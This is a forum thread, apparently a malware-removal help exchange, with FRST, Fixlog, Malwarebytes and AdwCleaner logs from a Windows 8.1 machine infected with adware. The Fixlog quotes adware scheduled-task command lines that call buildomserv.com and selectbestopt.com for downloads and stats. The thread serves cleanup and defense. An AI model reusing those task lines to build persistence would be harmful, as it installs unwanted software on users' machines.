2013-11-16 01:08 - 2009-02-27 17:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2013-12-02 19:28 - 2015-03-13 12:41 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2013-07-22 10:39 - 2013-05-31 13:30 - 01199576 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 01174856 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\libglesv2.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 00080200 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\libegl.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 09279304 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\pdf.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 14974280 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\PepperFlash\pepflashplayer.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\User\Local Settings:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\SkyDrive:ms-properties
AlternateDataStreams: C:\Users\User\AppData\Local:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Application Data:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Temporary Internet Files:honRL14HPG0qKpaoTgpSHKJ

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Local\Microsoft\Windows\Themes\Antarctic\DesktopBackground\antarctic7.jpg
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Local\Microsoft\Windows\Themes\Antarctic\DesktopBackground\antarctic7.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\StartupFolder: => "SolidWorks 2014 Fast Start.lnk"
HKLM\...\StartupApproved\StartupFolder: => "SolidWorks Background Downloader.lnk"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "SaiMfd"
HKLM\...\StartupApproved\Run: => "ProfilerU"
HKLM\...\StartupApproved\Run32: => "Acrobat Assistant 8.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "JunosPulse"

==================== Accounts: =============================

Administrator (S-1-5-21-2601788436-2821952545-4294816460-500 - Administrator - Disabled)
ASPNET (S-1-5-21-2601788436-2821952545-4294816460-1005 - Limited - Enabled)
Guest (S-1-5-21-2601788436-2821952545-4294816460-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2601788436-2821952545-4294816460-1007 - Limited - Enabled)
User (S-1-5-21-2601788436-2821952545-4294816460-1002 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

Name: Logitech_LGVirHid49713
Description: Logitech_LGVirHid49713
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Logitech_LGVirHid49714
Description: Logitech_LGVirHid49714
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (04/06/2015 10:12:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 36.0.4.5557 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1608

Start Time: 01d070f13029fd46

Termination Time: 46

Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Report Id: b349b6e6-dce4-11e4-bf70-0c8bfd398315

Faulting package full name:

Faulting package-relative application ID:

Error: (04/06/2015 10:12:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 36.0.4.5557, time stamp: 0x550d0883
Faulting module name: mozalloc.dll, version: 36.0.4.5557, time stamp: 0x550cfa82
Exception code: 0x80000003
Fault offset: 0x00001e02
Faulting process id: 0x89c
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3
Faulting package full name: plugin-container.exe4
Faulting package-relative application ID: plugin-container.exe5

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.0.0.0.0.0.0.0.0.0.0.0.0.0.8.E.F.ip6.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.0.0.0.0.0.0.0.0.0.0.0.0.0.8.E.F.ip6.arpa. PTR Gigabyte.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 2.2.F.0.6.1.4.0.3.E.E.3.C.F.1.C.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 2.2.F.0.6.1.4.0.3.E.E.3.C.F.1.C.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 121.0.0.10.in-addr.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 121.0.0.10.in-addr.arpa. PTR Gigabyte.local.

System errors:
=============
Error: (04/06/2015 10:09:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The LiveUpdate service failed to start due to the following error:
%%2

Error: (04/06/2015 10:08:26 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/06/2015 09:53:36 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The LiveUpdate service failed to start due to the following error:
%%2

Error: (04/06/2015 09:53:31 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.

Error: (04/06/2015 09:53:01 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/06/2015 09:49:03 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 18 time(s).

Error: (04/06/2015 09:49:03 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 17 time(s).

Error: (04/06/2015 09:49:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 16 time(s).

Error: (04/06/2015 09:49:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 15 time(s).

Error: (04/06/2015 09:47:14 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 14 time(s).

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2015-04-02 22:51:31.430
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:31.290
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:31.156
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:31.009
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.875
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.742
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.603
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.463
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.324
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.192
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Memory info ===========================

Processor: Intel® Core™ i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 46%
Total physical RAM: 8106.47 MB
Available physical RAM: 4370.53 MB
Total Pagefile: 10090.47 MB
Available Pagefile: 5952.14 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB

==================== Drives ================================

Drive c: (WINDOWS) (Fixed) (Total:98.22 GB) (Free:25.08 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:931.39 GB) (Free:350.65 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: 1F18311A)

Partition: GPT Partition Type.

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT Partition Type.

==================== End Of Log ============================



#7 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 09 April 2015 - 10:44 PM

any update?

Thanks!



#8 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 10 April 2015 - 02:47 AM

Hi,

 
Please download the following file => and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.
 

Regards,
Georgi


cXfZ4wS.png


#9 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 11 April 2015 - 01:39 AM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 11-03-2015
Ran by User at 2015-04-10 23:36:24 Run:2
Running from C:\Users\User\Desktop\Malware software
Loaded Profiles: User &  (Available profiles: User)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences\my-prefs.js
C:\Program Files (x86)\Mozilla Firefox\my.cfg
HKLM-x32\...\Run: [] => [X]
BHO: Super Radio -> {11111111-1111-1111-1111-110611791177} -> No File
FF Extension: PDFConverterLight - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{41819e5a-4017-4be3-b1be-0868b2283ac1}.xpi [2014-11-30]
FF Extension: {80d2992f-5865-424f-bfbe-3e558ae15978} - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{80d2992f-5865-424f-bfbe-3e558ae15978}.xpi [2014-11-19]
CHR Extension: (miss sunshine) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\didlppefmhmoiaeemeffjchbieeghlan [2015-04-06]
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [X]
2015-04-06 21:18 - 2015-04-06 21:53 - 00000004 _____ () C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-04-06 20:18 - 2015-04-06 22:18 - 00001348 _____ () C:\WINDOWS\Tasks\miss_sunshine_notification_service.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00001004 _____ () C:\WINDOWS\Tasks\oHBfPuiYh.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00000710 _____ () C:\WINDOWS\Tasks\miss_sunshine_updating_service.job
2015-04-06 20:18 - 2015-04-06 22:08 - 00000000 ____D () C:\Program Files (x86)\miss sunshine
2015-04-06 20:18 - 2015-04-06 20:18 - 00004344 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_notification_service
2015-04-06 20:18 - 2015-04-06 20:18 - 00004008 _____ () C:\WINDOWS\System32\Tasks\oHBfPuiYh
2015-04-06 20:18 - 2015-04-06 20:18 - 00003706 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_updating_service
2015-03-31 01:14 - 2015-03-31 01:14 - 00004387 _____ () C:\Users\User\AppData\Roaming\oHBfPuiYh
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\Super Radio
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\globalUpdate
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\0a1c1a41-5084-4b11-9f5e-84411f0df977
Task: {17A02B50-2ACC-4619-879F-CAD3CA0637E6} - System32\Tasks\oHBfPuiYh => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
Task: {A08AD4AB-C3CC-4AA3-A1DE-6E88C9036847} - System32\Tasks\miss_sunshine_notification_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exe
Task: {B492C228-9821-4206-9375-CB872E57B430} - System32\Tasks\miss_sunshine_updating_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe
Task: C:\WINDOWS\Tasks\miss_sunshine_notification_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exeé/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='miss sunshine' /appid='73143' /srcid='2913' /bic='8ba9e3ea18d9ab8d382924758032ff5d' /verifier='c70975eaec473c280c707979692583c8' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif?' /installationtime='1428376683' /runfrom='task' /brwtype='notbg' /postponedhours='6'.GIG
Task: C:\WINDOWS\Tasks\miss_sunshine_updating_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe® /campid=2913 /verid=1 /url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=miss_sunshine_updating_service /funurl=http:/stats.buildomserv.com
Task: C:\WINDOWS\Tasks\oHBfPuiYh.job => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
AlternateDataStreams: C:\Users\User\Local Settings:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Application Data:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Temporary Internet Files:honRL14HPG0qKpaoTgpSHKJ
reboot:
end
*****************

Restore point was successfully created.
Processes closed successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences\my-prefs.js => Moved successfully.
C:\Program Files (x86)\Mozilla Firefox\my.cfg => Moved successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611791177}" => Key deleted successfully.
"HKCR\CLSID\{11111111-1111-1111-1111-110611791177}" => Key deleted successfully.
C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{41819e5a-4017-4be3-b1be-0868b2283ac1}.xpi => Moved successfully.
C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{80d2992f-5865-424f-bfbe-3e558ae15978}.xpi => Moved successfully.
C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\didlppefmhmoiaeemeffjchbieeghlan directory not found.
LiveUpdateSvc => Service deleted successfully.
C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 => Moved successfully.
"C:\WINDOWS\Tasks\miss_sunshine_notification_service.job" => File/Directory not found.
C:\WINDOWS\Tasks\oHBfPuiYh.job => Moved successfully.
"C:\WINDOWS\Tasks\miss_sunshine_updating_service.job" => File/Directory not found.
"C:\Program Files (x86)\miss sunshine" => File/Directory not found.
"C:\WINDOWS\System32\Tasks\miss_sunshine_notification_service" => File/Directory not found.
C:\WINDOWS\System32\Tasks\oHBfPuiYh => Moved successfully.
"C:\WINDOWS\System32\Tasks\miss_sunshine_updating_service" => File/Directory not found.
C:\Users\User\AppData\Roaming\oHBfPuiYh => Moved successfully.
C:\Program Files (x86)\Super Radio => Moved successfully.
C:\Program Files (x86)\globalUpdate => Moved successfully.
C:\Program Files (x86)\0a1c1a41-5084-4b11-9f5e-84411f0df977 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{17A02B50-2ACC-4619-879F-CAD3CA0637E6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{17A02B50-2ACC-4619-879F-CAD3CA0637E6}" => Key deleted successfully.
C:\Windows\System32\Tasks\oHBfPuiYh not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\oHBfPuiYh" => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A08AD4AB-C3CC-4AA3-A1DE-6E88C9036847} => Key not found.
C:\Windows\System32\Tasks\miss_sunshine_notification_service not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\miss_sunshine_notification_service => Key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B492C228-9821-4206-9375-CB872E57B430} => Key not found.
C:\Windows\System32\Tasks\miss_sunshine_updating_service not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\miss_sunshine_updating_service => Key not found.
C:\WINDOWS\Tasks\miss_sunshine_notification_service.job not found.
C:\WINDOWS\Tasks\miss_sunshine_updating_service.job not found.
C:\WINDOWS\Tasks\oHBfPuiYh.job not found.
"C:\Users\User\AppData\Roaming\oHBfPuiYh.exe" => File/Directory not found.
"C:\Users\User\Local Settings" => ":uX64zwMvt2ofvbwnRqkfi0gFk3" ADS not found.
C:\Users\User\AppData\Local => ":uX64zwMvt2ofvbwnRqkfi0gFk3" ADS removed successfully.
"C:\Users\User\AppData\Local\Application Data" => ":uX64zwMvt2ofvbwnRqkfi0gFk3" ADS not found.
"C:\Users\User\AppData\Local\Temporary Internet Files" => ":honRL14HPG0qKpaoTgpSHKJ" ADS not found.

The system needed a reboot.

==== End of Fixlog 23:36:41 ====



#10 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 11 April 2015 - 01:42 AM

It seems like the problem has gone away.

No more pop ups and randomly redirecting me to random sites.

Does the log show that my computer is clean now?

Thanks!



#11 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 11 April 2015 - 04:32 AM

Hi,

 

Nice work! :)

 

Let's check for PUPs leftovers:

 

 

STEP 1

 

Please download Malwarebytes Anti-Malware 2.1.4.1018 Final to your desktop.
 

  • Double-click mbam-setup-2.0.4.1028.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 2

 

 

Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer.
  • After the scan has finished click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

 

STEP 3

 

 

thisisujrt.gif  Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

 

That's it for now. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#12 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 13 April 2015 - 12:59 AM

Hi, Chrome still has the problem, but firefox and IE seems fine.

I have pasted the Malwarebytes log as requested below.

I will follow up with 2 more posts.
Thanks again for the help!

 

-------------------------------------------------------------------------------------------------------------

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 4/12/2015
Scan Time: 10:38:47 PM
Logfile:
Administrator: Yes

Version: 2.01.4.1018
Malware Database: v2015.04.13.02
Rootkit Database: v2015.03.31.01
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Enabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: User

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 416580
Time Elapsed: 11 min, 55 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Warn
PUM: Warn

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 4
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_static.selectgo00.selectgo.net_0.localstorage, Quarantined, [20f683e997f32a0c1c2016b510f351af],
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_static.selectgo00.selectgo.net_0.localstorage-journal, Quarantined, [58bef577b0dad95d61db7d4e72919b65],
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_static.select-n-go00.select-n-go.com_0.localstorage, Quarantined, [fa1ccaa21f6b52e45acc72847390a25e],
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_static.select-n-go00.select-n-go.com_0.localstorage-journal, Quarantined, [4bcb026ae6a4d06637ef4fa790734cb4],

Physical Sectors: 0
(No malicious items detected)

(end)



#13 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 13 April 2015 - 01:06 AM

AdwCleaner

--------------------------------------------------------------------------------------

# AdwCleaner v4.201 - Logfile created 12/04/2015 at 23:03:10
# Updated 08/04/2015 by Xplode
# Database : 2015-04-08.1 [Server]
# Operating system : Windows 8.1  (x64)
# Username : User - GIGABYTE
# Running from : C:\Users\User\Desktop\Malware software\adwcleaner_4.201.exe
# Option : Cleaning

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\baidu
Folder Deleted : C:\ProgramData\Innovative Solutions
Folder Deleted : C:\Program Files (x86)\Innovative Solutions
Folder Deleted : C:\Program Files (x86)\Common Files\Innovative Solutions
Folder Deleted : C:\Users\User\AppData\Local\Temp\baidu
Folder Deleted : C:\Users\User\AppData\Local\globalUpdate
Folder Deleted : C:\Users\User\AppData\Local\Innovative Solutions
Folder Deleted : C:\Users\User\AppData\LocalLow\baidu
Folder Deleted : C:\Users\User\AppData\Roaming\baidu
Folder Deleted : C:\Users\User\AppData\Roaming\RHEng
Folder Deleted : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\magicplayer@acestream.org
Folder Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhnkgpdlogbknkhlgdjlejeljbhflim
File Deleted : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\YouTubeAutoReplay@arikv.com.xpi
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mfhnkgpdlogbknkhlgdjlejeljbhflim_0.localstorage
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mfhnkgpdlogbknkhlgdjlejeljbhflim_0.localstorage-journal
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage
